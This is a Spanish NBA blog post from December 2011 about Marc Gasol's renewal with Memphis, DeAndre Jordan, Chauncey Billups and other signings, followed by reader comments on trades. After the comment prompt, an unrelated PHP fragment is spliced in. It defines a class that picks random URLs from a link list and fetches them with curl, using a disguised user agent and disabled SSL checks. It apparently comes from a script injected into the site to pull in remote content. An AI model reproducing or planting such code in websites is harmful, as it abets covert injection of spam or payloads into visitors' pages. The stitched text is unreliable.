Marc Gasol se queda en los Grizzlies

13 de December de 2011 por TheDeerHunter

La noticia de hoy no puede ser otra que la renovación de Marc Gasol por Memphis por 58$ millones en 4 años. Es decir, el máximo disponible despejando cualquier duda que hubiera de las intenciones de la franquicia por el jugador y por su futuro y, de paso, matando las esperanzas de Houston de resarcirse tras el batacazo de la semana pasada.

Ojo, porque los Clippers no se han quedado cortos y han igualado la ofertaza de 43$ millones en 4 que tenía DeAndre Jordan encima de la mesa ofrecida por los Warriors y, del tirón sacan a Chauncey Billups de su mini-retiro espiritual por tan sólo 2$M. ¿Será posible que ahora mismo puedan ser más atractivos que, por ejemplo, sus ilustres vecinos? Y también surge la pregunta: ¿cómo se va a seguir planteando el asunto Chris Paul en este contexto? Se rumorea que hoy se resolverá todo.

Seguimos con ronda de renovaciones: Los Suns retienen a Grant Hill (tras haber fichado a Shannon Brown y a Telfair); Orlando a Jason Richardson; Cavs a Anthony Parker; NY a Jared Jeffries (fichando a Bibby) y, como todos estabais ansiosos por confirmar, Chicago renueva a Brian Scalabrine y, atención, Dallas a Brian Cardinal (¡bieeeeen!)

Sobre estas última franquicia varios movimientos interesantes: Vince Carter y Delonte West firmarán con Dallas recobrando fuerza la rumoreada salida de Rudy.

Por su parte los Celtics mandan a Glen Davis y Von Wafer a Orlando a cambio de Brandon Bass. Minnesotta confirma el fichaje de Barea y aspira a recuperar nada menos que a Bonzi Wells.

En el ámbito de los cortados, los Pistons hacen lo propio con Kareem Rush después de liberar a Hamilton (que firmará casi con total probabilidad con los Bulls) e Indiana aplicará amnistía a Posey.

En otro orden de cosas, y es raro que no lo hayamos comentado, el mecenas ruso de los Nets Mikhail Prokhorov tiene planeado presentarse nada menos que a la presidencia de Rusia. Desconozco cómo de compatible es ese cargo con llevar un equipo NBA.

Comenta

64 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Tendria que ser via sign and trade con utah. Pero si lo firmaran y añadieran un base traspasando a Artest o Blake si tendrian un gran equipo este año. Otra opción seria ofrecer esos casi 9 kilos a Detroit por Stuckey.

      Citar

  2. HisRoyalAirness dice:
    #2

    Ojo chicos que el League Pass está gratuíto hasta el 9 de enero

      Citar

  3. Esteban dice:
    #3

    Cocinitas:
    Tendria que ser via sign and trade con utah. Pero si lo firmaran y añadieran un base traspasando a Artest o Blake si tendrian un gran equipo este año. Otra opción seria ofrecer esos casi 9 kilos a Detroit por Stuckey.

    creo q blake no es un mal base, el tema es que el triangulo se juega sin base, creo que con brown puede funcionar mucho mejor

    los 9 millones alcanzarian para un traspaso por MO, los lakers suman asi a un abse que ya fue dirigido y rindio bien con brown, y los clippers se liberarian de 9 millones que pueden ser fundamentales para renovar a kaman a fin de curso

    imaginemos estos clippers por dos o tres años mas algun agente libre:

    billups-bledsone
    gordon-foye
    butler-aminu-gomes
    griffin
    jordan-kaman

    debo ser yo, pero siento debilidad por ese trio interior, ademas creo que billups aun tiene dos años de gran nivel y a la vez no se cortaria el progreso de bledsone

      Citar

  4. Sancho88 dice:
    #4

    Cocinitas:
    Por cierto acabo de ver la foto de Perkins y todavia estoy flipando, o gana musculo o no se yo que tal lo pasará defendiendo a otros pivots. Es alucinante sino la habeis visto aqui sale con Curry http://www.nbamaniacs.com/eddy-curry-y-kendrick-perkins-aprovechando-el-lockout/

    Perkins es como cuando bubú gordo se convirtió en bubú viejo, ahí to chupao. jajaja

      Citar

  5. Sancho88 dice:
    #5

    Por cierto, breaking news. NENÉ SE QUEDA EN DENVER!! Acuerdo por 67 millones por cinco años. 13,4 al año. Por debajo de Marc. XD. Al final los Nets pues como siempre, con el señor Brooks López de center. Yo creo que al final Prokorov acabará haciendo alguna locura royo recuperar a Shaquille O’Neal para el baloncesto, o alguna frikada de esas, ya lo veréis.

      Citar

  6. melo15 dice:
    #6

    Que es el league pass

      Citar

  7. Denise dice:
    #7

    Esteban:

    creo que aun pueden salvar a gasol, y meter a bynun por howard y el mal contrato de torkoglu y asi salvar las papas,

    Ennn?? Howard + Turkoglu por Bynum??? Primero los salarios no cuadran y aun valiese la operación por otras reglas de traspasos que desconozco, sería un timo a los Magic a cara descubierta. Ningun GM se tragaría ese fichaje.

      Citar

  8. Nacho dice:
    #8

    Los Nets ofrecen a López y a Deron al CSKA Moscú, y Prokorov presidente de Rusia, a cambio del contratazo de Putin. Los ex de Jersey a su vez mandan a Putin de teniente de alcalde de Nueva YorK a cambio de 5 años de exención de impuestos.
    ¡Gran jugada de los Nets que liberan mogollón de espacio salarial y abren mercado en Rusia, donde ya hay manifestaciones de alegría brutales!
    Todo a la espera de que Stern apruebe la operación.

      Citar

  9. Txusma dice:
    #9

    Esteban:
    dejemonos de joder con roy y todo lo que podria haber dado, q creo que seria mucho, quiza estuvo lejos de su techo es verdad, pero nunca sabremos cual era ese techo, podemos decir que seria tan bueno como lebron, pero lo cierto es q nunca lo llego a ser y nunca sabremos hasta donde podria haber llegado

    Cito a Esteban pero contesto tb a Nacho.

    Yo no hablo de lo que podría haber sido Roy yo hablo de lo que era y mucho más allá de las estadísticas. Las estadísticas no lo son todo pero sí una buena parte. Y es que en este caso, la elegancia, el talento, el liderazgo y el clutch de Brandon Roy era innegable.

    Me da que en España no se es del todo objetivo con este jugador por culpa de la situación que pasó Rudy en los Blazers.

      Citar

  10. Txusma dice:
    #10

    HisRoyalAirness: Jajaja vaya energúmeno con lo de la camiseta! ya sabía yo que era una debilidad tuya pero eso es amor!

    Evidentemente es una exageración… 😀

      Citar

  11. Jose Luis dice:
    #11

    Denise: Ennn?? Howard + Turkoglu por Bynum??? Primero los salarios no cuadran y aun valiese la operación por otras reglas de traspasos que desconozco, sería un timo a los Magic a cara descubierta. Ningun GM se tragaría ese fichaje.

    Denise, no lo veo tan descabellado si entran ciertas rondas de Draft, aunque ahora con la renovación de Richardson quizá Orlando quiera mantener a Howard y ver si es capaz de irse como FA (que seguro que sí, pero bueno).

    Los salarios cuadran porque los Lakers tienen una Trade Exception de casi 9 millones, generada en el traspaso de Odom a Dallas, y también tienen una primera ronda de draft, generada en ese mismo traspaso. Eso, más lo que tengan de draft por sí mismos, y si mandan a Blake por Duhon yo creo que lo aceptan seguro. El contrato de Turkoglu es un cáncer, y el de Duhon cerca de lo mismo, por eso Orlando se lo quiere quitar de encima. Orlando quedaría con mucha flexibilidad, y con Bynum en lugar de Howard. Bynum es un pívot de 14-9 en los Lakers, un equipo con mucho talento, en uno con menos, puede irse fácilmente a 19-12 o así, y jugando con Anderson de 4 abierto, creo que se puede hinchar. El riesgo son las lesiones, por supuesto. Decían de un triple-traspaso Howard-Bynum-Bogut, pero no sé si Orlando prefiere a Bogut antes que a Bynum, ni las demás piezas que entrarían en esa operación.

      Citar

  12. Txusma dice:
    #12

    La trade exception no se puede usar como dices, Jose Luis. El equipo que tiene la trade exception solo puede acompañarla de elecciones de draft y dinero en efectivo, no de jugadores. Y diría tb que a cambio solo puede recibir un jugador.

    Otra cosa es que se divida el traspaso en 2 y así lo cuadraran (del rollo: Turkoglu x la trade exception y luego Howard x Bynum)

      Citar

  13. Txusma dice:
    #13

    HisRoyalAirness:
    Bueno, una cosa, no entiendo mucho esta fascinación “post-mortem” por Brandon Roy. Aquí, como en muchos otros sitios se le ha dado cera a base de bien, tanto por chupón como por condicionar hasta límites insospechados el juego de su equipo.
    Uno de los 3-5 mejores exteriores de la liga? Nos estamos volviendo locos? Wade, Kobe, Chris Paul, Deron, Nash y lo dejo porque hay bastantes más.
    Nadie ha comparado a Griffin con Duncan, se ha señalado, y muy acertadamente, que esos números en temporada rookie sólo los consiguieron Shaq y Duncan (2 tíos que se han repartido 8 de los últimos 12 anillos, casi nada).
    Y de Oden siempre se habló mucho en la Universidad pero sobre todo como 5 defensivo y con buena proyección. De Griffin se hablaba como jugador franquicia y algo fuera de lo común.

    Por cierto, una foto del nuevo aspecto de Eddy Curry http://2.bp.blogspot.com/-BtoyVx03vtQ/TcZy01vvUHI/AAAAAAAAAbw/z1meqemUmJI/s1600/tumblr_ljrt6mKohD1qi3p64o1_400.jpg

    Viene a cuento.

    Artículo de Gonzalo Vázquez sobre Brandon Roy: http://es.eurosport.yahoo.com/blogs/la-unidad/homo-erectus-071122458.html#more-id

      Citar

  14. TheDeerHunter dice:
    #14

    Acerca de esto último yo no quiero verme salpicado.
    Yo nunca he criticado concretamente a Brandon Roy por su juego. Siempre me pareció un jugador exquisito y su pérdida me parece una tragedia para la liga.
    Al que siempre le he puesto a caldo es a McMillan por el uso “abusivo” que hacía de él y perjudicaba al resto. Léase Sergio/Rudy o léase Aldridge (que se demostró el año pasado), Batum o una larga lista de nombres interesantes. A mí el baloncesto cansino nunca que me ha llamado y el de McPakete es el más sobón que yo me haya tirado a la cara.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>